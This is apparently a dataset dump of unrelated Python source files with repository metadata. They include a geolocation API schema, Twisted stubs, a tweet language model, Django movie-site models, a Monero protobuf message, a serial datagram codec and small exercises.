9d296c259a2e461bf5c93b18863d06131d8b435c | 9e2d79a2cf1dbeaffe8ef897bb53f94af8b5b68c | /ichnaea/api/submit/schema_v0.py | 369e4e1815bfa4d4f1b610b8b794b4d3dfea8f60 | [
"Apache-2.0"
] | permissive | amolk4games/ichnaea | a7d1cbd12b6aa5c0d877fca380080b08fcff24b8 | 907c542da05b428c8e994bce1537390e22b3ca58 | refs/heads/master | 2021-01-19T07:21:54.851167 | 2016-04-08T15:20:37 | 2016-04-08T15:21:52 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,408 | py | """
Colander schemata describing the public v1/submit HTTP API.
"""
import colander
from ichnaea.api.schema import (
OptionalBoundedFloatNode,
OptionalIntNode,
OptionalMappingSchema,
OptionalNode,
OptionalSequenceSchema,
OptionalStringNode,
UnixTimeFromString,
)
class BlueV0Schema(OptionalMappingSchema):
    """One Bluetooth beacon observation; v0 keys renamed to v2 output names."""

    key = OptionalStringNode(to_name='macAddress')

    age = OptionalIntNode()
    name = OptionalStringNode()
    signal = OptionalIntNode(to_name='signalStrength')

    def deserialize(self, data):
        data = super(BlueV0Schema, self).deserialize(data)
        # A beacon without a MAC address is unusable; drop the whole entry.
        if 'macAddress' not in data:
            return colander.drop
        return data
class CellV0Schema(OptionalMappingSchema):
    """One cell tower observation; v0 keys renamed to v2 output names."""

    radio = OptionalStringNode(to_name='radioType')
    mcc = OptionalIntNode(to_name='mobileCountryCode')
    mnc = OptionalIntNode(to_name='mobileNetworkCode')
    lac = OptionalIntNode(to_name='locationAreaCode')
    cid = OptionalIntNode(to_name='cellId')

    age = OptionalIntNode()
    asu = OptionalIntNode()
    psc = OptionalIntNode(to_name='primaryScramblingCode')
    serving = OptionalIntNode()
    signal = OptionalIntNode(to_name='signalStrength')
    ta = OptionalIntNode(to_name='timingAdvance')
class WifiV0Schema(OptionalMappingSchema):
    """One WiFi access point observation; v0 keys renamed to v2 output names."""

    key = OptionalStringNode(to_name='macAddress')

    age = OptionalIntNode()
    channel = OptionalIntNode()
    frequency = OptionalIntNode()
    radio = OptionalStringNode(to_name='radioType')
    signal = OptionalIntNode(to_name='signalStrength')
    signalToNoiseRatio = OptionalIntNode()
    ssid = OptionalStringNode()

    def deserialize(self, data):
        data = super(WifiV0Schema, self).deserialize(data)
        # A network without a MAC address is unusable; drop the whole entry.
        if 'macAddress' not in data:
            return colander.drop
        return data
class BaseReportV0Schema(OptionalMappingSchema):
    """Per-report position/motion fields shared by the v0 submit schemata."""

    lat = OptionalBoundedFloatNode(to_name='latitude')
    lon = OptionalBoundedFloatNode(to_name='longitude')

    time = OptionalNode(UnixTimeFromString(), to_name='timestamp')

    accuracy = OptionalBoundedFloatNode()
    age = OptionalIntNode()
    altitude = OptionalBoundedFloatNode()
    altitude_accuracy = OptionalBoundedFloatNode(
        to_name='altitudeAccuracy')
    heading = OptionalBoundedFloatNode()
    pressure = OptionalBoundedFloatNode()
    radio = OptionalStringNode(to_name='radioType')
    speed = OptionalBoundedFloatNode()
    source = OptionalStringNode()
class ReportV0Schema(BaseReportV0Schema):
    """One full v0 report: position fields plus blue/cell/wifi observations."""

    # Fields that get moved under a nested 'position' mapping on output.
    _position_fields = (
        'latitude',
        'longitude',
        'accuracy',
        'altitude',
        'altitudeAccuracy',
        'age',
        'heading',
        'pressure',
        'speed',
        'source',
    )

    @colander.instantiate(to_name='bluetoothBeacons', missing=())
    class blue(OptionalSequenceSchema):  # NOQA
        sequence_item = BlueV0Schema()

    @colander.instantiate(to_name='cellTowers', missing=())
    class cell(OptionalSequenceSchema):  # NOQA
        sequence_item = CellV0Schema()

    @colander.instantiate(to_name='wifiAccessPoints', missing=())
    class wifi(OptionalSequenceSchema):  # NOQA
        sequence_item = WifiV0Schema()

    def deserialize(self, data):
        """Normalise a v0 report: propagate the top-level radio to cells and
        gather the position fields under a 'position' sub-mapping."""
        data = super(ReportV0Schema, self).deserialize(data)
        if (data is colander.drop or
                data is colander.null):  # pragma: no cover
            return colander.drop
        # Reports carrying no observations at all are dropped entirely.
        if not (data.get('bluetoothBeacons') or data.get('cellTowers') or
                data.get('wifiAccessPoints')):
            return colander.drop
        top_radio = data.get('radioType', None)
        for cell in data.get('cellTowers', ()):
            # NOTE(review): precedence here is ``A or (B and C)``; when the
            # cell lacks a radioType key and top_radio is None this still
            # assigns None -- confirm ``(A or B) and C`` was not intended.
            if 'radioType' not in cell or not cell['radioType'] and top_radio:
                cell['radioType'] = top_radio
            # Normalise the legacy name: umts -> wcdma.
            if cell.get('radioType') == 'umts':
                cell['radioType'] = 'wcdma'
        if 'radioType' in data:
            del data['radioType']
        # Move top-level position/motion fields into a nested mapping.
        position_data = {}
        for field in self._position_fields:
            if field in data:
                position_data[field] = data[field]
                del data[field]
        if position_data:
            data['position'] = position_data
        return data
class SubmitV0Schema(OptionalMappingSchema):
    """Top-level v0 submit body: ``{'items': [report, ...]}``."""
    @colander.instantiate()
    class items(OptionalSequenceSchema):  # NOQA
        report = ReportV0Schema()

# Module-level singleton schema instance.
SUBMIT_V0_SCHEMA = SubmitV0Schema()
| [
"hanno@hannosch.eu"
] | hanno@hannosch.eu |
fe972e3f143c34206e2f70eec1e9dd21dc51fb48 | f85c41af07c89af418b7565d289e8237ebe433f1 | /stubs/twisted/web/server.pyi | 201fab94b71c99ae8d97155f18bb20ed7273cc8f | [
"Apache-2.0"
] | permissive | matrix-org/sydent | 3b58e9488ce594b4fc803f9114d9b137a500611c | 77cb99e3fc6a77c3bc2b66005770bd940060fae4 | refs/heads/main | 2023-08-04T09:52:33.984167 | 2023-07-31T10:53:38 | 2023-07-31T10:53:38 | 22,844,878 | 269 | 103 | Apache-2.0 | 2023-09-12T11:17:20 | 2014-08-11T15:52:07 | Python | UTF-8 | Python | false | false | 669 | pyi | from typing import Callable, Optional
from twisted.web import http
from twisted.web.resource import IResource
# Type stubs: presumably only the members this code base touches are
# declared -- the real implementations live in twisted.web.server.
class Request(http.Request): ...

# A requestFactory is allowed to be "[a] factory which is called with (channel)
# and creates L{Request} instances.".
RequestFactory = Callable[[http.HTTPChannel], Request]

class Site(http.HTTPFactory):
    displayTracebacks: bool
    def __init__(
        self,
        resource: IResource,
        requestFactory: Optional[RequestFactory] = ...,
        # Args and kwargs get passed to http.HTTPFactory. But we don't use them.
        *args: object,
        **kwargs: object,
    ): ...

# Opaque sentinel; callers only ever compare against it, never inspect it.
NOT_DONE_YET = object  # Opaque
| [
"noreply@github.com"
] | matrix-org.noreply@github.com |
eafab3a40a8fcd6e8f3c5f79a7ab45fb09a1997d | e27333261b8e579564016c71d2061cc33972a8b8 | /development_codes/Backend/.history/UnigramLanguageModelImplementation_20210809204100.py | d1971d7e1650058901c9456feb9356fa2684514b | [] | no_license | Dustyik/NewsTweet_InformationRetrieval | 882e63dd20bc9101cbf48afa6c3302febf1989b1 | d9a6d92b51c288f5bcd21ea1cc54772910fa58f7 | refs/heads/master | 2023-07-01T09:12:53.215563 | 2021-08-12T08:28:33 | 2021-08-12T08:28:33 | 382,780,359 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,156 | py | import math
from IPython.display import display
import sys
from BM25implementation import QueryParsers
ALPHA = 0.75
NORMALIZE_PROBABILITY = True


class UnigramLanguageModel:
    """Unigram (query-likelihood) language model over a tweet corpus.

    ``tweets_data`` is a pandas DataFrame with a ``clean_text`` column of
    whitespace-separated, pre-cleaned tweet strings.

    Fix vs. the original: the leftover debug ``print`` calls (which spammed
    stdout once per scored word) were removed; scoring is unchanged.
    """

    def __init__(self, tweets_data):
        self.tweets_data = tweets_data
        # Corpus-wide term counts, available for collection smoothing.
        self.wordsCollectionFrequencyDictionary = self.create_words_frequency_dict(tweets_data)

    def create_words_frequency_dict(self, tweets_data, collection=True):
        """Return a {word: count} dict.

        With ``collection=True`` count over the DataFrame's ``clean_text``
        column; otherwise ``tweets_data`` is an iterable of words.
        """
        word_frequency_dictionary = {}
        if collection:
            for sentence in tweets_data.clean_text.tolist():
                for word in sentence.split(" "):
                    word_frequency_dictionary[word] = word_frequency_dictionary.get(word, 0) + 1
        else:
            for word in tweets_data:
                word_frequency_dictionary[word] = word_frequency_dictionary.get(word, 0) + 1
        return word_frequency_dictionary

    def calculate_total_no_of_words(self, wordsCollectionFrequencyDictionary):
        """Total token count represented by a frequency dictionary."""
        return sum(wordsCollectionFrequencyDictionary.values())

    def calculate_unigram_probability(self, word: str, wordCollectionFrequencyDictionary):
        """P(word) under the given counts; unseen words fall back to
        1/total (add-one style smoothing, as in the original)."""
        totalNumberOfWords = self.calculate_total_no_of_words(wordCollectionFrequencyDictionary)
        return wordCollectionFrequencyDictionary.get(word, 1) / totalNumberOfWords

    def calculate_interpolated_sentence_probability(self, querySentenceList: list, document,
                                                    alpha=ALPHA, normalize_probability=NORMALIZE_PROBABILITY):
        """Product over query terms of ``alpha * P(term | document)``.

        NOTE(review): the collection term of Jelinek-Mercer interpolation
        was disabled in the original (the ``+ 0`` with the (1-alpha) factor
        commented out); that behaviour is preserved here -- confirm intent.
        """
        total_score = 1
        documentWordFrequencyDictionary = self.create_words_frequency_dict(
            list(document.split(" ")), collection=False)
        for word in querySentenceList:
            total_score *= alpha * self.calculate_unigram_probability(word, documentWordFrequencyDictionary)
        if normalize_probability:
            return total_score
        # Log base 2 of the (un-normalised) probability.
        return math.log(total_score) / math.log(2)

    def getQueryLikelihoodModelScore(self, querySentence: list):
        """Score every tweet against the query and return the DataFrame
        sorted in place by descending score (adds a score column)."""
        querySentenceList = QueryParsers(querySentence).query
        self.tweets_data["QueryLikelihoodModelScore"] = self.tweets_data.apply(
            lambda row: self.calculate_interpolated_sentence_probability(querySentenceList, row.clean_text),
            axis=1)
        self.tweets_data.sort_values(by='QueryLikelihoodModelScore', ascending=False, inplace=True)
        return self.tweets_data
| [
"chiayik_tan@mymail.sutd.edu.sg"
] | chiayik_tan@mymail.sutd.edu.sg |
def unikati(s):
    """Return the elements of s with duplicates removed, keeping the order
    of first occurrence."""
    unique = []
    for element in s:
        if element in unique:
            continue
        unique.append(element)
    return unique
def avtor(tvit):
    """Return the tweet's author: the text before the first colon."""
    ime, _, _ = tvit.partition(":")
    return ime
def vsi_avtorji(tviti):
    """Return the unique authors of the tweets, ordered by first tweet."""
    return unikati([avtor(tvit) for tvit in tviti])
def izloci_besedo(beseda):
    """Strip every character that is not alphanumeric or a hyphen."""
    ohranjeno = [znak for znak in beseda if znak.isalnum() or znak == "-"]
    return "".join(ohranjeno)
def se_zacne_z(tvit, c):
    """Return the cleaned-up words of the tweet that start with prefix c."""
    zadetki = []
    for beseda in tvit.split():
        if beseda.startswith(c):
            zadetki.append(izloci_besedo(beseda))
    return zadetki
def zberi_se_zacne_z(tviti, c):
    """Collect the unique cleaned-up words starting with c over all tweets."""
    zbrano = []
    for tvit in tviti:
        zbrano.extend(se_zacne_z(tvit, c))
    return unikati(zbrano)
def vse_afne(tviti):
    """Return all unique @-mentions across the tweets (punctuation and the
    leading '@' stripped by izloci_besedo)."""
    omembe = [izloci_besedo(beseda)
              for tvit in tviti
              for beseda in tvit.split()
              if beseda.startswith("@")]
    return unikati(omembe)
def vsi_hashtagi(tviti):
    """Return all unique hashtags across the tweets (punctuation and the
    leading '#' stripped by izloci_besedo)."""
    oznake = [izloci_besedo(beseda)
              for tvit in tviti
              for beseda in tvit.split()
              if beseda.startswith("#")]
    return unikati(oznake)
def vse_osebe(tviti):
    """Return a sorted list of everyone involved: authors plus @-mentions."""
    osebe = [avtor(tvit) for tvit in tviti]
    osebe += vse_afne(tviti)
    return unikati(sorted(osebe))
def custva(tviti, hashtagi):
    """Return the sorted unique authors whose tweet contains any of the
    given hashtags. Matching is a plain substring test, as before."""
    avtorji = [avtor(tvit)
               for tvit in tviti
               for oznaka in hashtagi
               if oznaka in tvit]
    return unikati(sorted(avtorji))
def se_poznata(tviti, oseba1, oseba2):
    """Return True iff one of the two people @-mentions the other.

    Fixes vs. the original:
    - mentions accumulate over *all* of an author's tweets (the old dict
      assignment kept only the last tweet's mentions);
    - a person with no tweets no longer hides the other direction (the
      old ``slovar[oseba2]`` lookup raised KeyError and returned False
      even when oseba1 did mention oseba2);
    - always returns a bool (the old code could fall through to None).
    """
    omembe = {}
    for tvit in tviti:
        najdene = [izloci_besedo(b) for b in tvit.split() if b.startswith("@")]
        omembe.setdefault(avtor(tvit), []).extend(najdene)
    return (oseba1 in omembe.get(oseba2, []) or
            oseba2 in omembe.get(oseba1, []))
| [
"lenart.motnikar@gmail.com"
] | lenart.motnikar@gmail.com |
a25e272a7d02407e4dcb9451996d404845773daf | 22bf910b64283b3c15cc4d80542e83fa89e9f09d | /monero_glue/messages/MoneroGetTxKeyRequest.py | b935838df9f412978aeb49278af672fb07c50028 | [
"MIT"
] | permissive | ph4r05/monero-agent | 24ed1aa17d6616b2ae6bcdb7b9997f982f8b7b5d | 0bac0e6f33142b2bb885565bfd1ef8ac04559280 | refs/heads/master | 2022-10-18T06:30:43.550133 | 2021-07-01T16:27:56 | 2021-07-01T16:27:56 | 126,215,119 | 24 | 5 | MIT | 2022-09-23T22:53:44 | 2018-03-21T17:18:21 | Python | UTF-8 | Python | false | false | 1,433 | py | # Automatically generated by pb2py
# fmt: off
from .. import protobuf as p
if __debug__:
try:
from typing import Dict, List # noqa: F401
from typing_extensions import Literal # noqa: F401
except ImportError:
pass
class MoneroGetTxKeyRequest(p.MessageType):
    """Protobuf message (wire type 550), auto-generated by pb2py.

    NOTE(review): generated file -- regenerate from the protobuf
    definitions instead of editing by hand.
    """
    MESSAGE_WIRE_TYPE = 550
    def __init__(
        self,
        address_n: List[int] = None,
        network_type: int = None,
        salt1: bytes = None,
        salt2: bytes = None,
        tx_enc_keys: bytes = None,
        tx_prefix_hash: bytes = None,
        reason: int = None,
        view_public_key: bytes = None,
    ) -> None:
        self.address_n = address_n if address_n is not None else []
        self.network_type = network_type
        self.salt1 = salt1
        self.salt2 = salt2
        self.tx_enc_keys = tx_enc_keys
        self.tx_prefix_hash = tx_prefix_hash
        self.reason = reason
        self.view_public_key = view_public_key
    @classmethod
    def get_fields(cls) -> Dict:
        # Field number -> (name, protobuf type, flags) mapping for (de)serialization.
        return {
            1: ('address_n', p.UVarintType, p.FLAG_REPEATED),
            2: ('network_type', p.UVarintType, 0),
            3: ('salt1', p.BytesType, 0),
            4: ('salt2', p.BytesType, 0),
            5: ('tx_enc_keys', p.BytesType, 0),
            6: ('tx_prefix_hash', p.BytesType, 0),
            7: ('reason', p.UVarintType, 0),
            8: ('view_public_key', p.BytesType, 0),
        }
| [
"dusan.klinec@gmail.com"
] | dusan.klinec@gmail.com |
0db085b02f0f82902740aec7e44bb19ae0918fef | 7b4e9342d42be2b55af5dc23a8abedd672d68e99 | /libs/flows/windows/jweb/flow_container.py | d286652e4bd3a203a05068468b2b900f0cf0c236 | [] | no_license | Amal548/QAMA | af5bb335c92a90b461f1ee9a3870435d83d46802 | b5230c51d3bc7bb04b3448d1a1fe5a076d8898d5 | refs/heads/master | 2023-07-12T09:17:04.624677 | 2021-08-06T08:01:11 | 2021-08-06T08:01:11 | 389,595,655 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,819 | py | import logging
from time import sleep
from MobileApps.libs.ma_misc import ma_misc
from MobileApps.libs.flows.windows.jweb.home import Home
from MobileApps.libs.flows.web.hp_id.hp_id import HPID
from MobileApps.libs.flows.windows.jweb.auth_plugin import AuthPlugin
from MobileApps.libs.flows.windows.jweb.eventing_plugin import EventingPlugin
from MobileApps.resources.const.windows.const import *
class FlowContainer(object):
    """Bundles the JWeb page-flow objects plus app-level helper actions."""
    def __init__(self, driver):
        self.driver = driver
        # Flow dictionary: page-object instances keyed by short name.
        self.fd = {"home": Home(driver),
                   "hpid": HPID(driver, context="NATIVE_APP"),
                   "auth_plugin": AuthPlugin(driver),
                   "eventing_plugin": EventingPlugin(driver)}
    @property
    def flow(self):
        # Read-only accessor for the flow dictionary.
        return self.fd
    # *********************************************************************************
    #                               ACTION FLOWS                                      *
    # *********************************************************************************
    # ----------------------- FROM HOME  -----------------------------
    def flow_load_home_screen(self):
        """
        Load to Home screen:
            -Launch the app only if the home menu button is not visible,
            -then maximize the window if it opened in the restored state.
        """
        app_name = APP_NAME.JWEB
        if not self.fd["home"].verify_menu_button():
            self.driver.launch_app(app_name)
        if self.fd["home"].verify_window_visual_state_normal():
            self.fd["home"].click_maximize_window()
    def close_jweb_app(self):
        '''
        Close the Jarvis reference app, if its close button is present.
        :parameter:
        :return:
        '''
        logging.debug("Closing Jarvis App...")
        if self.fd["home"].verify_close_window():
            self.fd["home"].click_close_window()
"amal.muthiah@hp.com"
] | amal.muthiah@hp.com |
f17b80dc4d7e285090138061fd5c7212a6c11d43 | 89044f6606e3ccfbbca0b0dacc277497e735d5d4 | /lecture02/exercise02-B/template.py | de5bc2e02d30081a54e08b493b21c899c65425fb | [
"MIT"
] | permissive | nd-cse-34872-su21/cse-34872-su21-examples | 10595f1d53ad3a45fd5e293a8705aefd66bf65c9 | 0294bb0964b502bbb8541054977988c4a3b49dab | refs/heads/master | 2023-05-14T09:55:26.573462 | 2021-06-08T14:23:59 | 2021-06-08T14:23:59 | 370,460,163 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 463 | py | #!/usr/bin/env python3
import sys
# Functions
# Symbol tables: openers and their matching closers, index-aligned.
LEFT_PBB = ('(', '[', '{')
RIGHT_PBB = (')', ']', '}')

def is_pbbmatched(s):
    """Return True iff the brackets in s are balanced and properly nested.

    Implements the TODO with the classic stack algorithm: push every
    opener; on a closer, the top of the stack must be its matching opener.
    Non-bracket characters are ignored.
    """
    match = dict(zip(RIGHT_PBB, LEFT_PBB))  # closer -> expected opener
    stack = []
    for ch in s:
        if ch in LEFT_PBB:
            stack.append(ch)
        elif ch in match:
            if not stack or stack.pop() != match[ch]:
                return False
    # Balanced only if nothing is left open.
    return not stack
# Main execution
def main():
    """Read lines from stdin and print 'Yes'/'No' per line, right-aligned,
    depending on whether the line's symbols are balanced."""
    for line in sys.stdin:
        line = line.rstrip()
        result = 'Yes' if is_pbbmatched(line) else 'No'
        print('{:>10}: {}'.format(line, result))

if __name__ == '__main__':
    main()
| [
"pbui@nd.edu"
] | pbui@nd.edu |
5ee64de7a0e5c54c20e9a919092352983197fa28 | edbcb34df3f31bda1e90d9926916da8efc24f65d | /app/models.py | 5130107da2b6efca832994dd037e4bf8af4bad4c | [] | no_license | yuansuixin/movies_project | 74281ceeb6cc6e890c7a7e8d3f9a84e13e2ffdc7 | 8cd5dac957e9475c5f61c4dd648718a8cb782981 | refs/heads/master | 2021-04-05T23:30:57.037168 | 2018-03-14T15:36:55 | 2018-03-14T15:36:55 | 125,233,508 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,096 | py | from django.db import models
# Create your models here.
# User account
class User(models.Model):
    # Password -- NOTE(review): stored as a plain CharField with no hashing
    # visible here; confirm passwords are hashed before save.
    u_password = models.CharField(max_length=32)
    # Nickname; also the primary key, so it must be unique.
    u_name = models.CharField(max_length=20,primary_key=True)
    # Avatar image path
    u_icon = models.ImageField(upload_to='icons')
    # Soft-delete flag
    isDelete = models.BooleanField(default=False)
    email = models.CharField(null=True,max_length=16)
# Carousel/banner entry
class Banner(models.Model):
    name = models.CharField(max_length=20)
    image = models.ImageField(upload_to='image')
    desc = models.CharField(max_length=200)
# Movie entry
class Movies(models.Model):
    title = models.CharField(max_length=100)
    desc = models.CharField(max_length=200)
    postid = models.IntegerField()
    image = models.ImageField(upload_to='image')
    like_num = models.IntegerField(default=0)
    request_url = models.CharField(max_length=200,null=True)
    is_like = models.BooleanField(default=False)
    duration = models.CharField(default=0,max_length=16)
# A user's "like" of a movie (many-to-many through table)
class Like(models.Model):
    like_user = models.ForeignKey(User)
    like_movies = models.ForeignKey(Movies)
| [
"cyss428@163.com"
] | cyss428@163.com |
13b03308cf7b6535f6bf15ad2090240da75658b2 | bfee360e228494749ce1f73f7bc48cf5f4698d3a | /excelplay_echo/core/urls.py | 25ee96a89465e3093bf6586026db47af2fb93213 | [] | no_license | Excel-MEC/excelplay-echo | 0cc1f8d2305c107f95c8e72f7929651ec44c2b0f | 2b062e2a783adb7abeb05420c0761734fa1d368f | refs/heads/master | 2021-04-18T21:26:59.333703 | 2019-01-14T17:34:54 | 2019-01-14T17:34:54 | 126,799,930 | 1 | 1 | null | 2018-10-26T09:13:41 | 2018-03-26T08:47:40 | Python | UTF-8 | Python | false | false | 321 | py | from django.urls import path
from core.views import Submissionform,Problem,handshake
# Routes for the Echo core app: submissions, problems, and handshake.
urlpatterns =[
    # path('leaderboard',Echoleaderboard.as_view(),name='leaderboard'),
    path('submit',Submissionform,name='finalsubmit'),
    path('probs',Problem,name='Problems'),
    path('handshake',handshake,name='handshake')
]
| [
"kurian.pro@gmail.com"
] | kurian.pro@gmail.com |
859ec81a3750696e6e42c17160e3397d0d0753fb | accdde552cda99d0fa328441bebdc7ce78b74f36 | /venv/Session6I.py | 4f258afe71ea77a573b36943755b33675423d95e | [] | no_license | navnoorsingh13/GW2019PA2 | 056f0b3d293d8a6f3ec149c8de01c96f0d46f826 | b94b2a5e1c6a760a5ada87e3f7a3117da552387d | refs/heads/master | 2022-01-17T13:20:57.446539 | 2019-07-19T10:53:37 | 2019-07-19T10:53:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 237 | py | # Pass By Reference
def squareOfNumbers(nums):
    """Square every element of nums in place (demonstrates that the caller's
    list object is mutated -- 'pass by reference')."""
    for index, value in enumerate(nums):
        nums[index] = value * value
numbers = [1, 2, 3, 4, 5]
squareOfNumbers(numbers)
print(numbers)
def fun(a, b, c):
pass
fun(a=10, c=20, b=30) | [
"er.ishant@gmail.com"
] | er.ishant@gmail.com |
ccd38499deb46018021dc170d1176876dd50b27e | 9f3488ddfdb02165f1be9a3ce3a4a3468af0e793 | /leetcode/273.integer-to-english-words.py | ca6936b235ba2fbf36945ffa81071a42077ea446 | [] | no_license | szr22/algorithm | b76646799272b81ea6dd179f0d07dba64d9b10d2 | bcf18a6583303dbd5a10776d2c70181b0733defb | refs/heads/master | 2022-05-13T13:59:27.471727 | 2022-04-15T18:27:55 | 2022-04-15T18:27:55 | 190,107,858 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,709 | py | #
# @lc app=leetcode id=273 lang=python3
#
# [273] Integer to English Words
#
# @lc code=start
class Solution:
    """LeetCode 273: convert a non-negative integer to English words."""

    def __init__(self):
        # Lookup tables: 0-19, multiples of ten, and thousand-power scale words.
        self.dictLessTwenty = ["", "One", "Two", "Three", "Four", "Five", "Six", "Seven", "Eight", "Nine", "Ten", "Eleven", "Twelve", "Thirteen", "Fourteen", "Fifteen", "Sixteen", "Seventeen", "Eighteen", "Nineteen"]
        self.dictTens = ["", "", "Twenty", "Thirty", "Forty", "Fifty", "Sixty", "Seventy", "Eighty", "Ninety"]
        self.dictMoreHundred = ["Thousand", "Million", "Billion"]

    def numberToWords(self, num: int) -> str:
        """Spell out ``num`` (0 <= num < 2**31) in English words.

        Works on groups of three digits from least to most significant.
        All-zero groups are skipped entirely (the original reached the same
        result via a dead, no-op bare ``res`` statement -- removed here).
        """
        words = self.numberToHundred(num % 1000)
        for scale in range(3):
            num //= 1000
            group = num % 1000
            if group:
                words = self.numberToHundred(group) + ' ' + self.dictMoreHundred[scale] + ' ' + words
        # Lower groups may leave trailing spaces when they are empty.
        words = words.rstrip(' ')
        return words if words else 'Zero'

    def numberToHundred(self, num: int) -> str:
        """Spell out 0..999; returns '' for 0."""
        remainder = num % 100
        if remainder < 20:
            words = self.dictLessTwenty[remainder]
        else:
            words = self.dictTens[remainder // 10]
            if remainder % 10:
                words += ' ' + self.dictLessTwenty[remainder % 10]
        hundreds = num // 100
        if hundreds:
            words = self.dictLessTwenty[hundreds] + ' Hundred' + ((' ' + words) if words else '')
        return words
# @lc code=end
num = 1234567891
num = 1051
res = Solution().numberToWords(num)
print(res) | [
"shizhenrong1987@hotmail.com"
] | shizhenrong1987@hotmail.com |
e889548a187ca2c0ffa106a9c7a66ec640690c87 | ab8a1749aa2b1ad5f5d6fde4ad83702b306c9946 | /bowler/_bowlerv3.py | 1feb828fe6c62dbfc524677718fea104647aa980 | [] | no_license | Auzzy/python-dyio | ae85fdf5cdf17c59f6923e0a7c3eccd97bdddc3a | 60ccc8b311ff23f897b102524fd5ebdf847a4b3a | refs/heads/master | 2016-09-01T09:26:24.517331 | 2013-03-10T21:36:29 | 2013-03-10T21:36:29 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,452 | py | from bowler import _DatagramBuilder,_DatagramParser
LENGTH = 11
class Affect(object):
    """Transaction-type ('affect') constants written into byte 7 of the
    Bowler v3 datagram header."""
    STATUS = 0x00
    GET = 0x10
    POST = 0x20
    CRIT = 0x30
    ASYNC = 0x40
class _Builder(_DatagramBuilder):
    """Assembles outgoing Bowler v3 datagrams (header + payload)."""
    @staticmethod
    def build(mac, func, args, affect, ns):
        # MAC arrives as 'aa:bb:...'; fromhex wants space-separated byte pairs.
        mac = mac.replace(':',' ')
        payload = _Builder._build_payload(func,args)
        header = _Builder._build_header(mac,affect,ns,len(payload))
        return header + payload
    @staticmethod
    def _build_header(mac, affect, ns, payload_size):
        # Layout: version 0x3 | mac(6) | affect | (ns<<1)|dir | length | checksum.
        header = bytearray()
        header.append(0x3)
        header.extend(bytearray.fromhex(mac))
        header.append(affect)
        header.append((ns << 1) | 0)  # direction bit forced to 0 for outgoing
        header.append(payload_size)
        header.append(sum(header) & 0x000000FF)  # low byte of the byte-sum
        return header
    @staticmethod
    def _build_payload(func, args):
        # RPC name right-aligned in a fixed 4-byte field, then raw args.
        # NOTE(review): bytearray(func, "hex") relies on the Python 2 'hex'
        # codec; this module is Python 2 only as written -- confirm.
        func_bytes = bytearray(4-len(func)) + bytearray(func,"hex")
        arg_bytes = _Builder.args_to_bytes(args)
        return func_bytes + arg_bytes
class _Parser(_DatagramParser):
    """Parses incoming Bowler v3 datagrams read from a serial port."""
    @staticmethod
    def parse(port, header):
        affect,dir,length = _Parser._parse_header(header)
        func = bytearray(port.read(length))
        if not func:
            # NOTE(review): SerialTimeoutException is not imported in this
            # module -- raising it would itself fail with NameError. Confirm.
            raise SerialTimeoutException("A timeout occurred while reading an incoming packet.")
        name,args = _Parser._parse_func(func)
        return name,args,affect,dir
    @staticmethod
    def _parse_header(header):
        # mac and ns are extracted but unused -- kept for documentation value.
        mac = header[1:7]
        affect = header[7]
        ns = header[8] >> 1
        dir = header[8] & 0x1
        length = header[9]
        checksum = header[10]
        # Checksum is the low byte of the sum of the first ten header bytes.
        data_checksum = sum(header[:10]) & 0x000000FF
        if checksum!=data_checksum:
            raise IOError("The received data was corrupted.")
        return affect,dir,length
    @staticmethod
    def _parse_func(func):
        # First 4 bytes: RPC name; remainder: raw argument bytes.
        return func[:4],func[4:]
def _get_affect(priority, state, is_async):
    """Map the (priority, state, async) request flags to an Affect code.

    Fix: the third parameter was named ``async``, which has been a reserved
    keyword since Python 3.7 and made this module a SyntaxError there.
    Positional callers are unaffected by the rename.
    """
    if priority == 0:
        return Affect.CRIT
    if state:
        return Affect.POST
    if is_async:
        return Affect.ASYNC
    return Affect.GET
def _unpack_affect(affect):
    """Inverse of _get_affect: recover the (priority, state, async) triple
    from an Affect code; unknown codes map to a plain GET."""
    known = {
        Affect.CRIT: (0, False, False),
        Affect.POST: (32, True, False),
        Affect.ASYNC: (32, False, True),
    }
    return known.get(affect, (32, False, False))
def build(mac, func, args=None, priority=32, state=False, is_async=False, encrypted=False, ns=0x0):
    """Build an outgoing Bowler v3 datagram for the given MAC and RPC name.

    Fixes: the ``async`` flag was renamed ``is_async`` (``async`` is a
    reserved keyword since Python 3.7); the mutable default ``args=[]``
    was replaced by the None-sentinel idiom. Positional callers see no
    difference.
    """
    if args is None:
        args = []
    affect = _get_affect(priority, state, is_async)
    return _Builder.build(mac, func, args, affect, ns)
# RETURN: func, args, priority, state, is_async, dir, encrypted
def parse(port, header):
    """Parse an incoming datagram.

    Returns (func, args, priority, state, is_async, direction, encrypted);
    encryption is not supported, so the last element is always False.
    The local previously named ``async`` (a keyword since Python 3.7) was
    renamed; the returned tuple is unchanged.
    """
    func, args, affect, direction = _Parser.parse(port, header)
    priority, state, is_async = _unpack_affect(affect)
    return func, args, priority, state, is_async, direction, False
| [
"metalnut4@netscape.net"
] | metalnut4@netscape.net |
f39f248f0bbe9ef7481745246946d51ff52cf137 | d2c4934325f5ddd567963e7bd2bdc0673f92bc40 | /tests/artificial/transf_Quantization/trend_Lag1Trend/cycle_7/ar_12/test_artificial_32_Quantization_Lag1Trend_7_12_20.py | 8aab6db49f32f6e1b077dd49b45246fcd79cf007 | [
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | jmabry/pyaf | 797acdd585842474ff4ae1d9db5606877252d9b8 | afbc15a851a2445a7824bf255af612dc429265af | refs/heads/master | 2020-03-20T02:14:12.597970 | 2018-12-17T22:08:11 | 2018-12-17T22:08:11 | 137,104,552 | 0 | 0 | BSD-3-Clause | 2018-12-17T22:08:12 | 2018-06-12T17:15:43 | Python | UTF-8 | Python | false | false | 272 | py | import pyaf.Bench.TS_datasets as tsds
import pyaf.tests.artificial.process_artificial_dataset as art
# Generated benchmark driver: 32-point daily series, Lag1Trend trend,
# cycle length 7, AR order 12, Quantization transform, 20 exogenous series.
art.process_dataset(N = 32 , FREQ = 'D', seed = 0, trendtype = "Lag1Trend", cycle_length = 7, transform = "Quantization", sigma = 0.0, exog_count = 20, ar_order = 12);
"antoine.carme@laposte.net"
] | antoine.carme@laposte.net |
